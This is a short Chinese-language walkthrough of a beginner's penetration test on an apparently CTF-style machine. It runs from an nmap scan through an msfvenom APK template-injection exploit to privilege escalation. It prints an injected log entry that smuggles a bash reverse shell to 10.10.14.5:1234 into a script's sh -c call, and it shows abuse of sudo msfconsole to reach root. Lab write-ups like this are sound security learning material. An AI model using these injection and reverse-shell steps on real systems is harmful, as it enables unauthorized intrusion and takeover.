题记
- 记录一次依葫芦画瓢的渗透测试
- 第一次做渗透测试 有点兴奋~
信息收集
- namp 扫描ip地址 发现开放的端口
- 访问一下端口
漏洞寻找
- 网页是一个在线的nmap工具(好像看过类似的CTF题目…)
- 输入一个ip地址试试
- 是Nmap的7.80版本
- 利用Exploit Database未发现有已知道的漏洞
- 还有一个venom工具
- 利用Exploit Database发现存在APK模板注入 网上给了漏洞的利用 可以直接拿
- 在利用exp生成apk文件的时候 需要安装
sudo apt-get install openjdk-11-jdk-headless
- 执行成功会生成evil.apk文件
- 接着监听5000端口
- 上传evil.apk文件
- 监听成功
漏洞利用
- 获取用户的shell 这里我用了msf
- 接着去提升一下权限
python3 -c 'import pty;pty.spawn("/bin/bash")'
- 获得了kid的权限
- 在获取kid权限后 发现了pwn用户 尝试获取其权限
- 并且返校了一个sh脚本
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
- 语句为真时执行nmap的扫描语句,否则将信息写入hackers文件
- 接着我们利用这个去获取pwn的权限
echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.5/1234 0>&1' #" >> hackers
sudo -l
发现可以利用msf去访root文件
sudo msfconsole
/bin/bash
cd /
cd /root
- 发现已经获取root权限了 okkk!!!